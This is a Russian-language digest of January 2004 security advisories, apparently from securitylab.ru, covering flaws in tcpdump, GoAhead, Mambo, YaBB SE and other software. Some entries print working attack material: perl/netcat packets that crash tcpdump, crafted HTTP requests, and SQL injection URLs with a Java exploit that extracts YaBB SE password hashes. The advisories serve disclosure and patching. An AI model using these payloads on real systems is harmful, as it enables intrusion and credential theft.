Программа: NetScreen-Security Manager 2004 Опасность: Низкая Наличие эксплоита: Не нужен Описание: Уязвимость обнаружена в NetScreen-Security Manager при подключении к with ScreenOS 5.0 устройствам. В конфигурации по умолчанию, данные передаются в открытом виде. Устройство в конфигурации по умолчанию не использует шифрованное подключение между NetScreen устройствами и системами, которые работают на ScreenOS 5.0 и Device Server компоненте NetScreen-Security Manager. Пользователь, способный контролировать сетевой трафик, может перехватить конфигурацию устройства и другую информацию. URL производителя: http://www.netscreen.com/services/security/alerts/1_19_04_58290.jsp Решение:Включите 128 бит шифрование |
Повышение привилегий в LINUX ядре на AMD64 системах
22 января | securitylab.ru
Программа: Linux AMD64 Kernel 2.4.21 Опасность: средняя Наличие эксплоита: Нет Описание: Уязвимость обнаружена в Linux ядре на AMD64 системах в обработке eflags. Локальный пользователь моежет получить поднятые привилегии. Уязвимость обанружена в eflags в обработке 32 битного ptrace режима эмуляции. Дополнительные подробности не раскрываются. URL производителя: http://www.kernel.org/ Решение:Исправление в настоящее время существует только для Red Hat Linux. |
Обнаружена ошибка в популярных антивирусных пакетах
22 января | asteraСотрудники германской фирмы AERAsec, специализирующейся на
вопросах компьютерной безопасности, сообщили об обнаружении неприятной ошибки в антивирусных
пакетах производства сразу трех компаний. Уязвимости подвержены программные
разработки Network Associates, Trend Micro и "Лаборатории Касперского".
Суть проблемы сводится к следующему. Во всех антивирусах вышеназванных
производителей имеется встроенная система декомпрессии, предназначенная для
проверки архивных файлов. Однако, как оказалось, механизм распаковки неправильно
взаимодействует с форматом bzip2. В результате, при декомпрессии больших архивов
bzip2 может происходить переполнение жесткого диска и, как следствие,
существенное замедление работы и даже "зависание" компьютера. В "Лаборатории Касперского" подтвердили информацию о наличии ошибки в
антивирусном пакете версии 5.0.1.0 для операционной системы Linux и сообщили,
что соответствующий патч, устраняющий проблему, уже выпущен. Компания Trend
Micro также выпустила заплатку для своих антивирусов семейства InterScan
Viruswall для ОС Linux, Solaris, AIX и HP-UX. Что касается уязвимого пакета
McAfee Virus Scan for Linux v4.16.0 производства Network Associates, то для
него, со слов представителей компании, патч должен появиться в самое ближайшее
время. Сотрудники AERAsec, между тем, тестируют на предмет наличия уязвимости
программные разработки других антивирусных компаний. Не исключено, что они также
подвержены данной ошибке.
Уязвимость в tcpdump в обработке L2TP пакетов
21 января | securitylab.ru
Программа: Tcpdump 3.8.1 и более ранние версии Опасность: Наличие эксплоита: Да Описание: Уязвимость обнаружена в tcpdump в обработке L2TP пакетов. Удаленный пользователь может аварийно завершить работу tcpdump Удаленный пользователь может послать специально обработанный L2TP пакет, не определяя длину параметров, чтобы заставить программу войти в бесконечный цикл или аварийно завершить ее работу. Уязвимость связанна с ошибкой в функции l2tp_avp_print(): perl -e 'print .\x80\x02...\x00.x6 | nc -u 10.1.1.1 1701 perl -e 'print .\x80\x00...\x00.x6 . .\x01.' | nc -u 10.1.1.1 1701 URL производителя: http://www.tcpdump.org Решение:Производитель выпустил обновление, доступное через CVS. |
Повышение локальных привилегий через Ultr@VNC
21 января | securitylab.ru
Программа: Ultr@VNC 1.0.0 RC11 Опасность: Низкая Наличие эксплоита: Да Описание: Уязвимость обнаружена в Ultr@VNC. Локальный пользователь может выполнить команды оболочки, чтобы получить привилегии системы. Локальный пользователь может кликнуть правой клавишей мышки на иконке в трее, чтобы получить доступ к IEXPLORE.EXE с SYSTEM привилегиями. Локальный пользователь может вызвать CMD.EXE, чтобы открыть командную строку с SYSTEM привилегиями. Пример: http://www.secnetops.biz/images/SRT2004-01-17-0425.jpg URL производителя: http://ultravnc.sourceforge.net Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. |
Определение существования файлов на системе в FTP сервере от Pablo Software SolutionsSolutions
21 января | securitylab.ru
Программа: Pablo FTP Server 1.77 Опасность: Низкая Наличие эксплоита: Да Описание: Уязвимость обнаружена в FTP сервере от Pablo Software Solutions. Удаленный пользователь может определить существование определенного файла на сервере. Удаленный авторизованный пользователь может использовать команду DEL на произвольном файле, расположенном вне FTP root каталога, чтобы определить существование файла. Если файл существует, сервер ответит следующим сообщением: 550 Permission denied.Если не существует, то: 550 File not found. URL производителя: http://www.pablovandermeer.nl/ftp_server.html Решение: Установите обновленную версию программы (1.4): http://www.pablovandermeer.nl/ftp_server.html |
Повышение локальных привилегий через Agnitum's Outpost Firewall
21 января | securitylab.ru
Программа: Agnitum Outpost Firewall 1.0, 2.0 Опасность: Низкая Наличие эксплоита: Да Описание: Уязвимость обнаружена в Agnitum's Outpost Firewall. Локальный пользователь может получить System привилегии. 'outpost.exe', который запускается с SYSTEM привилегиями, позволяет локальному пользователю загрузить CMD.EXE через трей иконку с SYSTEM привилегиями. Пример:
URL производителя: http://www.agnitum.com/download/outpostpro.html Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. |
Доступ к к опознавательным мандатам базы данных в BUGS
21 января | securitylab.ruДоступ к к опознавательным мандатам базы данных в BUGS
Программа: BUGS до версии 1.2
Опасность: Высокая
Наличие эксплоита: Да
Описание: Уязвимость обнаружена в BUGS. Удаленный пользователь может получить доступ к опознавательным мандатам базы данных.
Удаленный пользователь может напрямую запросить 'bugs/userbase_connect.inc' файл, чтобы просмотреть опознавательные мандаты базы данных.
URL производителя: http://bugs-bug-genie.sourceforge.net
Решение: Установите обновленную версию программы: http://sourceforge.net/project/showfiles.php?group_id=89533
Небезопасное создание временных файлов в Netpbm
21 января | securitylab.ru
Программа: Netbpm 10.19 и более ранние версии Опасность: Низкая Наличие эксплоита: Да Описание: Несколько уязвимостей обнаружено в Netpbm. Локальный пользователь может получить поднятые привилегии на целевой системе. Несколько компонентов netpbm небезопасно создают временные файлы. В результате удаленный пользователь может выполнить нападение символьных ссылок, чтобы перезаписать произвольные файлы на системе с поднятыми привилегиями. URL производителя: http://netpbm.sourceforge.net Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. |
Другие публикации: |
Доступ к защищенным каталогам и файлам в GoAhead Web Server
21 января | securitylab.ru
Программа: GoAhead Web Server 2.1.8 Опасность: Наличие эксплоита: Да Описание: Уязвимость обнаружена в GoAhead Web Server. Удаленный пользователь может получить доступ к некоторым ограниченным каталогам, типа 'cgi-bin'. Удаленный пользователь может представить специально обработанный HTTP Get запрос, чтобы получить доступ к файлам в защищенном каталоге: GET file HTTP/1.0 GET \file HTTP/1.0 GET /\\%5cfile HTTP/1.0 URL производителя: http://www.goahead.com/webserver/webserver.htm Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. |
Удаленное выполнение произвольных команд в Mambo Open Source
21 января | securitylab.ru
Программа: Mambo 4.5, 4.6 Опасность: Критическая Наличие эксплоита: Да Описание: Уязвимость обнаружена в Mambo Open Source. Удаленный пользователь может выполнить произвольные команды на целевой системе. Удаленный пользователь может представить специально обработанное значение для $mosConfig_absolute_path в 'mod_mainmenu.php', чтобы включить и выполнить произвольный PHP код на целевом сервере с привилегиями Web сервера. URL производителя: http://www.mamboserver.com/ Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. |
Отказ в обслуживании против GetWare WebCam Live Web Server и GetWare PhotoHost Web Server
21 января | securitylab.ru
Программа: GetWare WebCam Live Web Server 2.01, GetWare PhotoHost Web Server 4.0 Опасность: Наличие эксплоита: Да Описание: Уязвимость обнаружена в GetWare WebCam Live Web Server и GetWare PhotoHost Web Server. Удаленный пользователь может вызвать отказ в обслуживании. Встроенный Web сервер не в состоянии правильно отфильтровать параметр Content-Length. В результате удаленный пользователь может послать около 300 HTTP запросов с отрицательным параметром Content-Length, чтобы аварийно завершить работу Web сервера. Пример/Эксплоит: http://aluigi.altervista.org/poc/wcamdos.zip URL производителя: http://www.getware.com/ph/index.htm Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. |
DoS против GoAhead Web Server
21 января | securitylab.ru
Программа: GoAhead Web Server 2.1.8 Опасность: Средняя Наличие эксплоита: Да Описание: Уязвимость обнаружена в GoAhead Web Server в обработке POST запросов. Удаленный пользователь может вызвать условия отказа в обслуживании. Удаленный пользователь может представить POST команду со специально обработанным Content-Length заголовком и затем оборвать подключение перед передачей данных, чтобы заставить сервер войти в бесконечный цикл. Пример: POST / HTTP/1.0 Content-Length: 10 123456789 Пример/Эксплоит: http://aluigi.altervista.org/poc/webpostmem.zip URL производителя: http://www.goahead.com/webserver/webserver.htm Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. |
SQL инъекция в YaBB SE форуме
21 января | securitylab.ru
Программа: YaBB SE 1.5.4, 1.5.3 и более ранние версии Опасность: Критическая Наличие эксплоита: Да Описание: Уязвимость обнаружена в YaBB SE в 'SSI.php'. Удаленный пользователь может внедрить произвольные SQL команды. Удаленный атакующий может представить специально обработанный URL, чтобы выполнить произвольные команды на основной базе данных. Уязвимость связанна с недостаточной фильтрацией данных, представленных пользователем в параметре ID_MEMEBER в функциях 'recentTopics' и 'welcome'. Пример: http://[target]/yabbse/SSI.php?function=recentTopics&ID_MEMBER=1+OR+1=2) +LEFT+JOIN+yabbse_log_mark_read+AS+lmr+ON+(lmr.ID_BOARD=t.ID_BOARD+AND+ lmr.ID_MEN+SELECT+ID_MEMBER,+ memberName,null,passwd,null,passwd,null,null,null,null,null,null+ FROM+yabbse_members+/* http://[target]/yabbse/SSI.php?function=recentTopics&ID_MEMBER =1+OR+1=1) +LEFT+JOIN+yabbse_log_mark_read+AS+lmr+ON+(lmr.ID_BOARD=t.ID_BOARD+AND+lmr.ID_ME ull,null+FROM+yabbse_members+/* http://[target]/yabbse/SSI.php?function=welcome&username=evilhaxor&ID_MEMBER=1+OR+1=2) +GROUP+BY+readBy+UNION+SELECT+ASCII(SUBSTRING(realName,1,1)+)+Эксплоит: /* * YabbSe SQL Injection test code * The code is very ugly but it works OK * Use at your own risk. * compile: * javac yabb.java * exec: * java yabb http://localhost/yabbse/yabbse154/ yabbse_ 1 * parameters are: * java yabb [url with path] [database_prefix] [ID_MEMBER] */ import java.net.*; import java.io.*; public class yabb { public static void main(String[] args) throws Exception { boolean lastChar = false; String Key = ""; for ( int count=1; count <= 32 ; count++) { URL yabbForum = new URL(args[0] + "SSI.php?function=welcome&username=evilhaxor&ID_MEMBER=1%20OR%201=2)%20GROUP %20BY%20readBy%20UNION%20SELECT%20ASCII(SUBSTRING(passwd,"+count+",1)%20)%20 %20,%20%200%20FROM%20"+args[1]+"members%20WHERE%20ID_MEMBER="+args[2]+"/*"); BufferedReader in = new BufferedReader(new InputStreamReader(yabbForum.openStream())); String inputLine; inputLine = in.readLine(); int pos = inputLine.indexOf("action=im"); int pos2 = inputLine.indexOf(" ", pos + 11); if ( pos < 0 ) { System.out.println("ERROR: The server doesn't return any data"); System.exit(0); } String theNumber = inputLine.substring( pos + 11, pos2); System.out.println(theNumber + "-" + new Character((char)Integer.parseInt(theNumber.trim())).toString()); Key += new Character((char)Integer.parseInt(theNumber.trim())).toString(); in.close(); } System.out.println("Hashed password : " + Key); } URL производителя: http://www.yabbse.org Решение:Установите обновленную версию программы (1.5.5): http://www.yabbse.org/download.php |
Инструменты управления содержанием Метод.ру
Дата создания документа: 16:00 22.01.04
http://subscribe.ru/
E-mail: ask@subscribe.ru |
Отписаться
Убрать рекламу |
В избранное | ||